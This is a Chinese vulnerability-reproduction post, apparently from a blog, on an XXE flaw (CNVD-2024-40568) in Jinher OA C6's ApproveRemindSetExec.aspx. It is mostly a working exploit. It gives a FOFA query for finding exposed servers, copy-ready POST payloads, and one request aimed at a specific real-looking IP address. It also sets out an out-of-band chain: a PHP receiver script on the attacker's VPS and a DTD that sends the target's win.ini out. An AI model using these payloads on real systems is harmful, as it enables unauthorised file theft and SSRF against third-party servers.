金和OA-C6 ApproveRemindSetExec.aspx XXE漏洞复现(CNVD-2024-40568)

0x01 产品描述:

金和C6协同管理平台是以"精确管理思想"为灵魂,围绕"企业协同四层次理论"模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

复制代码
POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

服务器快速检测:

复制代码
POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

复制代码
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

构造dtd用以读取,dtd里内容如下

复制代码
<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

复制代码
POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/

相关推荐
南玖yy2 小时前
内存安全的攻防战:工具链与语言特性的协同突围
开发语言·c++·人工智能·安全·c++23·c++基础语法
自由鬼8 小时前
如何清理电脑数据保护个人数据隐私
运维·服务器·安全·电脑·数据隐私
恒拓高科WorkPlus12 小时前
安全企业内部im,BeeWorks即时通讯
安全
christine-rr14 小时前
【25软考网工】第四章(4)无线局域网WLAN安全技术、无线个人网WPAN
笔记·安全·信息与通信·网络工程师·软考·考试
智驱力人工智能15 小时前
科技赋能景区:AI算法如何破解夏季安全管理难题
人工智能·科技·算法·安全·智慧城市·边缘计算·智慧园区
GIS数据转换器16 小时前
智慧交警系统架构设计方案
人工智能·安全·机器学习·计算机视觉·系统架构·智慧城市
努力也学不会java16 小时前
【网络原理】 《TCP/IP 协议深度剖析:从网络基础到协议核心》
网络·网络协议·tcp/ip·安全·php
Blossom.11816 小时前
智能机器人在物流行业的应用:效率提升与未来展望
大数据·人工智能·神经网络·安全·机器学习·计算机视觉·机器人
kaamelai18 小时前
Kaamel白皮书:OpenAI 在安全方向的实践
大数据·人工智能·安全
火绒终端安全管理系统20 小时前
钓鱼网页散播银狐木马,远控后门威胁终端安全
网络·安全·web安全·网络安全·火绒安全